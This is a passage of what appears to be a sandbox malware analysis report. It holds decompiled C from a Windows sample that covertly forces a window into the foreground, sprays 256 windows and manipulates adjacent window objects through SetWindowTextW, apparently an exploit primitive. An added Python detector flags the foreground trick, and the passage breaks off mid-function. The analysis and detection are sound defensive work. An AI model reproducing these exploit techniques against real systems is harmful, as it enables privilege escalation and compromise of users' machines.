                      /* 0x009313f4 */					return E0093161C(0x100, _v8 ^ _t39, _t35, _t36, _t38); // __security_check_cookie-style epilogue
                      /* 0x009313f4 */				}
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 00931359
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 0093136C
                      • GetLastError.KERNEL32 ref: 00931374
                      • CharUpperBuffW.USER32(?,00000000), ref: 00931387
                      • GetCurrentProcess.KERNEL32(00000000), ref: 009313AD
                      • IsWow64Process.KERNEL32(00000000), ref: 009313B4
                      • GetCurrentProcessId.KERNEL32 ref: 009313C7
                        • Part of subcall function 0093CA30: Sleep.KERNEL32(000000C8,?,00000000), ref: 0093CA5A
                        • Part of subcall function 0093CA30: GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093CA64
                        • Part of subcall function 0093CA30: LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093CA70
                      • GetCurrentProcessId.KERNEL32 ref: 009313D5
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentModule$FileName$BuffCharErrorHandleLastLibraryLoadSleepUpperWow64
                      • String ID:
                      • API String ID: 3568178790-0
                      • Opcode ID: 35be446d29427ffb4b644bb8314b622d14e84c64365d2a962451b0f590f19da1
                      • Instruction ID: b4a17da2929a5f37249162b82927c3f80656d4a4a4fc8ba2e8f3837ac273b2c6
                      • Opcode Fuzzy Hash: 35be446d29427ffb4b644bb8314b622d14e84c64365d2a962451b0f590f19da1
                      • Instruction Fuzzy Hash: 3C119876918218DBDB64ABB0DD89BBE73BCFF04301F100495E685E20A0DF749D449FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0093D050(struct HWND__* _a4) {
                      				int _v8;   // ANIMATIONINFO.iMinAnimate
                      				void _v12; // ANIMATIONINFO.cbSize (8)
                      				struct HWND__* _t12;
                      				int _t18;
                      				int _t20;
                      				int _t24;
                      				struct HWND__* _t26;
                      
                      				// Statement addresses (the original side-by-side column) are given in the left margin.
                      /* 0x0093d057 */				_t12 = GetForegroundWindow();
                      /* 0x0093d05d */				_t26 = _a4;
                      /* 0x0093d062 */				if(_t12 == _t26) { // already the foreground window: nothing to do
                      /* 0x0093d104 */					return _t12;
                      /* 0x0093d104 */				}
                      /* 0x0093d073 */				_t24 = 0; // saved iMinAnimate; 0 means nothing to restore
                      /* 0x0093d075 */				_v12 = 8;
                      /* 0x0093d082 */				_v8 = 0;
                      				// SPI_GETANIMATION (0x48): read the user's minimize/restore animation setting
                      /* 0x0093d089 */				if(SystemParametersInfoW(0x48, 8,  &_v12, 0) != 0) {
                      /* 0x0093d08b */					_t20 = _v8;
                      /* 0x0093d090 */					if(_t20 != 0) {
                      /* 0x0093d094 */						_t24 = _t20;
                      /* 0x0093d096 */						_v12 = 8;
                      /* 0x0093d0a0 */						_v8 = 0;
                      						// SPI_SETANIMATION (0x49) with iMinAnimate = 0: switch the animation off so that the
                      						// minimize/restore below is instantaneous and nothing visible happens on screen
                      /* 0x0093d0ac */						SystemParametersInfoW(0x49, 8,  &_v12, 0);
                      /* 0x0093d0ac */					}
                      /* 0x0093d090 */				}
                      				// WM_SYSCOMMAND (0x112) SC_MINIMIZE (0xf020) followed by SC_RESTORE (0xf120): restoring a minimized
                      				// window activates it, a well-known way of getting a window activated when a bare
                      				// SetForegroundWindow call from a process that is not in the foreground would be refused.
                      /* 0x0093d0c1 */				SendMessageW(_t26, 0x112, 0xf020, 0);
                      /* 0x0093d0d0 */				SendMessageW(_t26, 0x112, 0xf120, 0);
                      /* 0x0093d0d3 */				SetFocus(_t26);
                      /* 0x0093d0da */				_t18 = SetForegroundWindow(_t26);
                      /* 0x0093d0e2 */				if(_t24 != 0) { // put the user's animation setting back
                      /* 0x0093d0e9 */					_v12 = 8;
                      /* 0x0093d0f5 */					_v8 = _t24;
                      /* 0x0093d0f8 */					_t18 = SystemParametersInfoW(0x49, 8,  &_v12, 0);
                      /* 0x0093d0f8 */				}
                      /* 0x00000000 */				return _t18;
                      			}

                      APIs
                      • GetForegroundWindow.USER32(?,?), ref: 0093D057
                      • SystemParametersInfoW.USER32 ref: 0093D085
                      • SystemParametersInfoW.USER32 ref: 0093D0AC
                      • SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093D0C1
                      • SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093D0D0
                      • SetFocus.USER32(?), ref: 0093D0D3
                      • SetForegroundWindow.USER32(?), ref: 0093D0DA
                      • SystemParametersInfoW.USER32 ref: 0093D0F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoParametersSystem$ForegroundMessageSendWindow$Focus
                      • String ID:
                      • API String ID: 1107571394-0
                      • Opcode ID: c43c0d85e6dd80115df916086cd6c71959c008e3f99a0bfc45891b2d20c03762
                      • Instruction ID: 33d56f13c60f7bb8187af3e0106e7df99d4f26b8aa967ca8a14cb5b453aa20a7
                      • Opcode Fuzzy Hash: c43c0d85e6dd80115df916086cd6c71959c008e3f99a0bfc45891b2d20c03762
                      • Instruction Fuzzy Hash: F2113D70A84308BAF7209B909C86FAE7BBCEB04B11F104069FA04BA1C0CBF469059F61
                      Uniqueness

                      Uniqueness Score: -1.00%
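                      The following is an added example and not code from the sample, from Joe Sandbox or from this report. It parses the "APIs" bullets in the format printed above ("Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:"), decodes the WM_SYSCOMMAND/SC_* constants, and checks for the three observable parts of the foreground grab performed by E0093D050: SC_MINIMIZE followed by SC_RESTORE, SystemParametersInfoW before and after that pair, and SetForegroundWindow after the restore. The SPI_* selector (0x48/0x49 = SPI_GETANIMATION/SPI_SETANIMATION) appears only in the decompiled body, not in the API list, so it is not checked here. The two input lists are copied from this report; the function and variable names are the example's own.

```python
"""Parse Joe Sandbox 'APIs' bullets and flag the minimize/restore foreground grab.

Added example for this report; not code from the analysed sample or from Joe Sandbox.
Assumed input format: one bullet per line as printed in the report's APIs sections.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Win32 constants, values as defined in the Windows SDK (winuser.h).
WM_SYSCOMMAND = 0x0112
SC_MINIMIZE = 0xF020
SC_RESTORE = 0xF120
SPI_GETANIMATION = 0x0048   # only visible in the decompiled body, not in the API list
SPI_SETANIMATION = 0x0049

# Joe Sandbox prints each argument as 8 hex digits, '?' when unresolved, or a literal
# such as USER32.dll; calls whose arguments were not recovered have no parentheses.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

Arg = Union[int, str, None]


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Arg]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee whose own calls are being listed, if any


def _parse_arg(text: str) -> Arg:
    text = text.strip()
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:
        return text  # e.g. "USER32.dll"


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Parse one bullet of an APIs list; returns None for any other line."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(a) for a in raw.split(",")] if raw else []
    sub = m.group("subfn")
    return ApiRef(api=m.group("api"), module=m.group("mod"), args=args,
                  ref=int(m.group("ref"), 16),
                  subcall_of=int(sub, 16) if sub else None)


def syscommand_of(ref: ApiRef) -> Optional[int]:
    """SC_* code if this call is SendMessageW(hwnd, WM_SYSCOMMAND, SC_*, ...)."""
    if ref.api == "SendMessageW" and len(ref.args) >= 3 and ref.args[1] == WM_SYSCOMMAND:
        return ref.args[2]
    return None


def foreground_grab_indicators(lines: List[str]) -> dict:
    """Three things the API list shows for the E0093D050-style foreground grab:
    1. WM_SYSCOMMAND SC_MINIMIZE followed by SC_RESTORE,
    2. SystemParametersInfoW both before and after that pair (the decompiled body
       shows SPI_GETANIMATION/SPI_SETANIMATION: animation off, then restored),
    3. SetForegroundWindow after the restore."""
    refs = [r for r in map(parse_api_line, lines) if r is not None]
    minimize = [i for i, r in enumerate(refs) if syscommand_of(r) == SC_MINIMIZE]
    restore = [i for i, r in enumerate(refs) if syscommand_of(r) == SC_RESTORE]
    spi = [i for i, r in enumerate(refs) if r.api == "SystemParametersInfoW"]
    setfg = [i for i, r in enumerate(refs) if r.api == "SetForegroundWindow"]
    pair_ok = bool(minimize and restore and minimize[0] < restore[0])
    return {
        "minimize_then_restore": pair_ok,
        "spi_brackets_pair": pair_ok and any(i < minimize[0] for i in spi)
        and any(i > restore[0] for i in spi),
        "set_foreground_after_restore": pair_ok and any(i > restore[0] for i in setfg),
    }


def is_foreground_grab(lines: List[str]) -> bool:
    return all(foreground_grab_indicators(lines).values())


# Input copied from this report: the eight bullets listed for E0093D050.
E0093D050_APIS = [
    "• GetForegroundWindow.USER32(?,?), ref: 0093D057",
    "• SystemParametersInfoW.USER32 ref: 0093D085",
    "• SystemParametersInfoW.USER32 ref: 0093D0AC",
    "• SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093D0C1",
    "• SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093D0D0",
    "• SetFocus.USER32(?), ref: 0093D0D3",
    "• SetForegroundWindow.USER32(?), ref: 0093D0DA",
    "• SystemParametersInfoW.USER32 ref: 0093D0F8",
]

# Input copied from this report: the subcalls of E0093BFE0 listed under E0093B970.
# That sibling routine has no SetFocus/SetForegroundWindow, so it must not match.
E0093BFE0_APIS = [
    "• Part of subcall function 0093BFE0: GetForegroundWindow.USER32(?,?), ref: 0093BFE7",
    "• Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C015",
    "• Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C03C",
    "• Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093C051",
    "• Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093C060",
    "• Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C07A",
]

if __name__ == "__main__":
    for name, lines in (("E0093D050", E0093D050_APIS), ("E0093BFE0", E0093BFE0_APIS)):
        print(name, foreground_grab_indicators(lines), "->", is_foreground_grab(lines))
```

                      Run against the two lists, E0093D050 matches on all three indicators while E0093BFE0 matches only the first two, which is exactly the difference between the two variants visible in the APIs lists above. The order check matters: SC_RESTORE before SC_MINIMIZE would be an ordinary window operation, not this trick.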

                      C-Code - Quality: 43%
                      			E0093D740(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				intOrPtr _v1004;
                      				short _v1008;
                      				intOrPtr _v1012;
                      				intOrPtr _v1016;
                      				intOrPtr _v1020;
                      				intOrPtr _v1024;
                      				intOrPtr _v1028;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t47;
                      				intOrPtr _t49;
                      				int _t56;
                      				int _t58;
                      				intOrPtr _t60;
                      				intOrPtr _t70;
                      				intOrPtr _t71;
                      				intOrPtr _t86;
                      				void* _t88;
                      				intOrPtr _t89;
                      				intOrPtr _t104;
                      				void* _t110;
                      				void* _t111;
                      				intOrPtr _t115;
                      				signed int _t116;
                      				void* _t117;
                      				void* _t118;
                      				intOrPtr _t121;
                      
                      				// Decompiler quality 43%: the arithmetic around L009310C5 is only partly recovered; comments below
                      				// are limited to what the recovered calls and constants establish. Statement addresses are in the margin.
                      /* 0x0093d749 */				_t47 =  *0x943050; // 0xce43520a (MSVC __security_cookie)
                      /* 0x0093d750 */				_v8 = _t47 ^ _t116; // stack canary
                      /* 0x0093d753 */				_t89 =  *0x958094;
                      /* 0x0093d759 */				_t49 =  *0x958068;
                      /* 0x0093d761 */				_t104 =  *((intOrPtr*)(_t89 + _t49));
                      /* 0x0093d76d */				_v1020 =  *((intOrPtr*)(_t89 + _t49 + 4));
                      /* 0x0093d77c */				_v1012 = 0xffffffff;
                      /* 0x0093d786 */				_v1016 = 0xffffffff;
                      /* 0x0093d790 */				_v1024 = _t104;
                      /* 0x0093d796 */				E00935A90( &_v1008, 0, 0x3e8); // _memset: zero the 1000-byte wide-character buffer
                      /* 0x0093d79e */				_t118 = _t117 + 0xc;
                      /* 0x0093d7a7 */				_v1008 = _a12;
                      /* 0x0093d7b0 */				_v1004 = _a16;
                      /* 0x0093d7bd */				_t56 = lstrlenW( &_v1008);
                      				// Unless the text is exactly 4 characters long, remember its byte length and store wchar 0x3333 after it
                      /* 0x0093d7c7 */				if(_t56 != 4) {
                      /* 0x0093d7c9 */					_t115 = _t56 + _t56;
                      /* 0x0093d7cc */					_v1012 = _t115;
                      /* 0x0093d7d2 */					 *((short*)(_t116 + _t115 - 0x3ec)) = 0x3333;
                      /* 0x0093d7d2 */				}
                      /* 0x0093d7e1 */				_t58 = lstrlenW( &_v1008);
                      /* 0x0093d7e6 */				if(_t58 != 4) {
                      /* 0x0093d7e8 */					_t86 = _t58 + _t58;
                      /* 0x0093d7e8 */					_t121 = _t86;
                      /* 0x0093d7ea */					_v1016 = _t86;
                      /* 0x0093d7f0 */					 *((short*)(_t116 + _t86 - 0x3ec)) = 0x3333;
                      /* 0x0093d7f0 */				}
                      /* 0x0093d7f8 */				_t88 = 1;   // iteration counter
                      /* 0x0093d7fd */				_t111 = 8;  // byte offset into the buffer, +8 per iteration
                      /* 0x0093d802 */				_t23 = _t88 + 3; // 0x4
                      /* 0x0093d802 */				_t110 = _t23;  // required string length, +4 per iteration
                      				// Fill the buffer 8 bytes at a time (E0093CEA0 result, then _t104) while the text is still at least
                      				// _t110 characters long and the 1000-byte buffer is not exhausted.
                      /* 0x0093d805 */				do {
                      /* 0x0093d80c */					asm("adc eax, [ebp+0xc]");
                      /* 0x0093d811 */					_t60 = E0093CEA0(_t121, _t111 + _a4, 0);
                      /* 0x0093d816 */					_t118 = _t118 + 8;
                      /* 0x0093d819 */					 *((intOrPtr*)(_t116 + _t111 - 0x3ec)) = _t60;
                      /* 0x0093d826 */					 *((intOrPtr*)(_t116 + _t111 - 0x3e8)) = _t104;
                      /* 0x0093d82d */					_t88 = _t88 + 1;
                      /* 0x0093d82e */					_t111 = _t111 + 8;
                      /* 0x0093d831 */					_t110 = _t110 + 4;
                      /* 0x0093d83b */				} while (lstrlenW( &_v1008) >= _t110 && _t111 < 0x3e8);
                      				// _t88 reaches 0x7d (125 = 0x3e8 / 8) only when the loop stopped because the buffer was full;
                      				// in that case the window text is left alone.
                      /* 0x0093d84a */				if(_t88 != 0x7d) {
                      /* 0x0093d872 */					_push(_a8);
                      /* 0x0093d877 */					_push(_a4);
                      /* 0x0093d87a */					asm("sbb esi, ecx");
                      /* 0x0093d889 */					_push( *0x958098 +  *0x958068 -  *0x9580a0);
                      /* 0x0093d88a */					asm("adc eax, esi");
                      /* 0x0093d88c */					_v1028 =  *0x95809c;
                      /* 0x0093d897 */					_push( *0x958080);
                      /* 0x0093d898 */					_push( *0x9441ec);
                      /* 0x0093d89e */					L009310C5(); // helper taking the pushed arguments; its body is not in this report
                      /* 0x0093d8b6 */					SetWindowTextW( *0x958090,  &_v1008); // the window whose handle is in global 0x958090 gets the buffer as its text
                      /* 0x0093d8b8 */					_t70 = _v1016;
                      /* 0x0093d8be */					__eflags = _t70 - 0xffffffff;
                      /* 0x0093d8c1 */					if(_t70 != 0xffffffff) {
                      /* 0x0093d8c3 */						__eflags = 0;
                      /* 0x0093d8c5 */						 *((short*)(_t116 + _t70 - 0x3ec)) = 0; // cut the buffer at the saved length and set the text again
                      /* 0x0093d8da */						SetWindowTextW( *0x958090,  &_v1008);
                      /* 0x0093d8da */					}
                      /* 0x0093d8dc */					_t71 = _v1012;
                      /* 0x0093d8e2 */					__eflags = _t71 - 0xffffffff;
                      /* 0x0093d8e5 */					if(_t71 != 0xffffffff) {
                      /* 0x0093d8e7 */						__eflags = 0;
                      /* 0x0093d8e9 */						 *((short*)(_t116 + _t71 - 0x3ec)) = 0;
                      /* 0x0093d8fe */						SetWindowTextW( *0x958090,  &_v1008);
                      /* 0x0093d8fe */					}
                      /* 0x0093d913 */					_push(_v1020);
                      /* 0x0093d91b */					_push(_v1024);
                      /* 0x0093d921 */					asm("sbb esi, ecx");
                      /* 0x0093d930 */					_push( *0x958098 +  *0x958068 -  *0x9580a0);
                      /* 0x0093d931 */					asm("adc eax, esi");
                      /* 0x0093d933 */					_v1028 =  *0x95809c;
                      /* 0x0093d93e */					_push( *0x958080);
                      /* 0x0093d945 */					L009310C5();
                      /* 0x0093d954 */					__eflags = _v8 ^ _t116;
                      /* 0x0093d95f */					return E0093161C(_t88, _v8 ^ _t116,  *0x958068 -  *0x9580a0, _t110, 0,  *0x9441ec); // cookie-check epilogue
                      /* 0x0093d84e */				} else {
                      /* 0x0093d85e */					return E0093161C(_t88, _v8 ^ _t116, _t104, _t110, _t111); // cookie-check epilogue
                      /* 0x0093d85e */				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: TextWindowlstrlen$_memset
                      • String ID:
                      • API String ID: 2993350514-0
                      • Opcode ID: d8a2fb2aa16799cd0dc75827ec5951c57dd2043ee17740eb811c4c3a430f2912
                      • Instruction ID: 3bb77a7ece29cb74d0f1637e18d13cccaf0be62cea509768ddd51f90edb03fc4
                      • Opcode Fuzzy Hash: d8a2fb2aa16799cd0dc75827ec5951c57dd2043ee17740eb811c4c3a430f2912
                      • Instruction Fuzzy Hash: 68518075A242589FCB15CF78EC90AAE73FDFB48310F1446AAE50DE7290DA309E459F50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E0093D23C(intOrPtr __edx) {
                      				struct HWND__* _t82;
                      				signed int _t83;
                      				void* _t85;
                      				void* _t87;
                      				intOrPtr _t88;
                      				struct HWND__* _t90;
                      				intOrPtr _t92;
                      				intOrPtr _t101;
                      				intOrPtr _t103;
                      				intOrPtr _t144;
                      				intOrPtr _t147;
                      				intOrPtr _t148;
                      				intOrPtr _t149;
                      				void* _t150;
                      				intOrPtr _t151;
                      				void* _t153;
                      				intOrPtr _t160;
                      				intOrPtr _t163;
                      				intOrPtr _t165;
                      				struct HWND__* _t167;
                      				void* _t168;
                      				signed int _t171;
                      				intOrPtr _t176;
                      				int _t177;
                      				void* _t178;
                      				signed int _t179;
                      				signed int _t180;
                      				struct _SECURITY_ATTRIBUTES* _t181;
                      				signed int _t185;
                      				void* _t203;
                      				void* _t205;
                      
                      				_t165 = __edx;
                      				 *(_t185 - 4) = 0xfffffffe; // MSVC SEH try-level bookkeeping: -2 = outside any __try block
                      				_t167 =  *(_t185 - 0xbf4); // window handle
                      				_t149 =  *((intOrPtr*)(_t185 - 0xbf8));
                      				_t176 =  *((intOrPtr*)(_t185 - 0xbf0)) + 1;
                      				while(1) { // at most 10 attempts (_t176 < 0xa)
                      					 *((intOrPtr*)(_t185 - 0xbf0)) = _t176;
                      					if(_t176 >= 0xa) {
                      						break;
                      					}
                      					 *(_t185 - 4) = 0; // enter the __try scope
                      					_push(0xdddddddd);
                      					_push(0xcccccccc);
                      					_push(0xfffffff4);
                      					_push(_t167);
                      					_t144 =  *0x9441ec; // 0x1471
                      					_push(_t144 - _t176);
                      					L009310C5(); // same helper as in E0093D740; its body is not in this report
                      					if( *((intOrPtr*)(_t149 + 0xc0)) == 0) {
                      						 *(_t185 - 4) = 0xfffffffe;
                      						_t176 = _t176 + 1;
                      						continue;
                      					}
                      					_t147 =  *0x9441ec; // 0x1471
                      					_t148 = _t147 - _t176;
                      					 *0x9441ec = _t148; // the global counter is decremented by the attempt number
                      					_t177 = 1;
                      					 *(_t185 - 0xbfc) = 1;
                      					if(_t148 == 0x1471) {
                      						 *0x958070 =  *0x958070 - 8;
                      					}
                      					 *(_t185 - 4) = 0xfffffffe;
                      					L8:
                      					DestroyWindow(_t167);
                      					if(_t177 == 0 ||  *0x958060 == 0 ||  *0x958064 == 0) {
                      						L52:
                      						goto L53;
                      					} else {
                      						// rep stosd with eax = 0x00610061: fills 100 dwords, i.e. 200 UTF-16 'a' characters
                      						memset(_t185 - 0x7ec, 0x610061, 0x64 << 2);
                      						 *((short*)(_t185 - 0x1e)) = 0;
                      						// A WNDCLASSEXW is being built on the stack: cbSize = 0x30 (sizeof(WNDCLASSEXW) on x86), style = 0,
                      						// lpfnWndProc = DefWindowProcW, so windows of this class handle no messages themselves
                      						 *(_t185 - 0xc38) = 0x30;
                      						 *((intOrPtr*)(_t185 - 0xc34)) = 0;
                      						 *((intOrPtr*)(_t185 - 0xc30)) = DefWindowProcW;
                      						 *(_t185 - 0xc2c) = 0;
                      						 *(_t185 - 0xc28) = 0;
                      						 *(_t185 - 0xc24) =  *0x9580b8;
                      						asm("xorps xmm0, xmm0");
                      						asm("movdqu [ebp-0xc20], xmm0");
                      						 *((intOrPtr*)(_t185 - 0xc10)) = L"MyExtraWnd";
                      						 *(_t185 - 0xc0c) = 0;
                      						if(RegisterClassExW(_t185 - 0xc38) == 0) {
                      							goto L52;
                      						}
                      						E00935A90(_t185 - 0xbec, 0, 0x400);
                      						_t171 = 0;
                      						while(1) {
                      							_t82 = CreateWindowExW(0, L"MyExtraWnd", _t185 - 0x7ec, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      							 *(_t185 + _t171 * 4 - 0xbec) = _t82;
                      							if(_t82 == 0) {
                      								break;
                      							}
                      							_t171 = _t171 + 1;
                      							if(_t171 < 0x100) {
                      								continue;
                      							}
                      							break;
                      						}
                      						_t83 = 0;
                      						 *(_t185 - 0xbf4) = 0;
                      						do {
                      							_t179 = 0;
                      							_t84 =  *((intOrPtr*)(_t185 + _t83 * 4 - 0xbec));
                      							 *((intOrPtr*)(_t185 - 0xbf0)) =  *((intOrPtr*)(_t185 + _t83 * 4 - 0xbec));
                      							while(1) {
                      								_t85 = E0093C750(_t84);
                      								_t151 =  *((intOrPtr*)(_t85 + 0x20));
                      								 *((intOrPtr*)(_t185 - 0xc08)) = _t151;
                      								 *((intOrPtr*)(_t185 - 0xc00)) =  *((intOrPtr*)(_t85 + 0x24));
                      								_t87 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
                      								_t160 =  *((intOrPtr*)(_t87 + 0x20));
                      								 *((intOrPtr*)(_t185 - 0xc04)) = _t160;
                      								_t165 =  *((intOrPtr*)(_t87 + 0x24));
                      								 *((intOrPtr*)(_t185 - 0xbf8)) = _t165;
                      								_t88 =  *((intOrPtr*)(_t185 - 0xc00));
                      								_t203 = _t88 - _t165;
                      								if(_t203 > 0 || _t203 >= 0 && _t151 >= _t160) {
                      									goto L23;
                      								}
                      								L20:
                      								_t165 = _t160 + 0x300;
                      								asm("adc ecx, 0x0");
                      								_t153 = _t151 + 0x40000;
                      								asm("adc eax, 0x0");
                      								_t205 = _t88 -  *((intOrPtr*)(_t185 - 0xbf8));
                      								if(_t205 > 0 || _t205 >= 0 && _t153 > _t165) {
                      									 *0x958080 =  *((intOrPtr*)(_t185 - 0xbf0));
                      									 *0x958090 =  *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec));
                      									 *0x958084 = E0093C750( *((intOrPtr*)(_t185 - 0xbf0)));
                      									 *0x958094 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
                      									 *0x958088 =  *((intOrPtr*)(_t185 - 0xc08));
                      									 *0x95808c =  *((intOrPtr*)(_t185 - 0xc00));
                      									 *0x958098 =  *((intOrPtr*)(_t185 - 0xc04));
                      									 *0x95809c =  *((intOrPtr*)(_t185 - 0xbf8));
                      									_t163 =  *0x958084;
                      									 *0x9580a8 =  *((intOrPtr*)(_t163 + 0x10));
                      									 *0x9580ac =  *((intOrPtr*)(_t163 + 0x14));
                      									asm("adc ecx, 0x0");
                      									asm("adc ecx, 0xffffffff");
                      									 *0x9580a0 =  *0x958088 +  *0x958060 + 0xfffffff8;
                      									 *0x9580a4 =  *0x95808c;
                      									L26:
                      									if( *0x958080 == 0 ||  *0x958090 == 0) {
                      										break;
                      									} else {
                      										goto L29;
                      									}
                      								}
                      								L23:
                      								_t179 = _t179 + 1;
                      								if(_t179 > _t171) {
                      									goto L26;
                      								}
                      								_t84 =  *((intOrPtr*)(_t185 - 0xbf0));
                      								_t85 = E0093C750(_t84);
                      								_t151 =  *((intOrPtr*)(_t85 + 0x20));
                      								 *((intOrPtr*)(_t185 - 0xc08)) = _t151;
                      								 *((intOrPtr*)(_t185 - 0xc00)) =  *((intOrPtr*)(_t85 + 0x24));
                      								_t87 = E0093C750( *((intOrPtr*)(_t185 + _t179 * 4 - 0xbec)));
                      								_t160 =  *((intOrPtr*)(_t87 + 0x20));
                      								 *((intOrPtr*)(_t185 - 0xc04)) = _t160;
                      								_t165 =  *((intOrPtr*)(_t87 + 0x24));
                      								 *((intOrPtr*)(_t185 - 0xbf8)) = _t165;
                      								_t88 =  *((intOrPtr*)(_t185 - 0xc00));
                      								_t203 = _t88 - _t165;
                      								if(_t203 > 0 || _t203 >= 0 && _t151 >= _t160) {
                      									goto L23;
                      								}
                      							}
                      							_t83 =  &( *(_t185 - 0xbf4)->i);
                      							 *(_t185 - 0xbf4) = _t83;
                      						} while (_t83 <= _t171);
                      						L29:
                      						_t180 = 0;
                      						do {
                      							_t90 =  *(_t185 + _t180 * 4 - 0xbec);
                      							if(_t90 !=  *0x958080 && _t90 !=  *0x958090) {
                      								DestroyWindow(_t90);
                      							}
                      							_t180 = _t180 + 1;
                      						} while (_t180 < 0x100);
                      						if( *0x958080 == 0 ||  *0x958090 == 0) {
                      							goto L52;
                      						} else {
                      							if( *0x95807c != 0) {
                      								L51:
                      								L53:
                      								 *[fs:0x0] =  *((intOrPtr*)(_t185 - 0x10));
                      								_pop(_t168);
                      								_pop(_t178);
                      								_pop(_t150);
                      								return E0093161C(_t150,  *(_t185 - 0x1c) ^ _t185, _t165, _t168, _t178);
                      							}
                      							while(1) {
                      								_t92 =  *0x944244; // 0xa
                      								if( *0x9580bc >= _t92) {
                      									goto L51;
                      								}
                      								 *0x9580d4 = 0;
                      								 *0x9580d8 = 0;
                      								 *0x9580d0 = 0;
                      								if( *0x95807c != 0) {
                      									L50:
                      									 *0x9580bc =  *0x9580bc + 1;
                      									if( *0x95807c == 0) {
                      										continue;
                      									}
                      									goto L51;
                      								}
                      								_t181 = 0;
                      								 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
                      								while( *0x9580d0 == 0) {
                      									_t181 =  &(_t181->nLength);
                      									Sleep(0x32);
                      									if(_t181 < 0x14) {
                      										continue;
                      									}
                      									break;
                      								}
                      								if(_t181 >= 0x14) {
                      									DestroyWindow( *0x9580d4);
                      									DestroyWindow( *0x9580d8);
                      									TerminateThread( *0x9580c0, 0xffffffff);
                      								} else {
                      									_t101 =  *0x94424c; // 0x1388
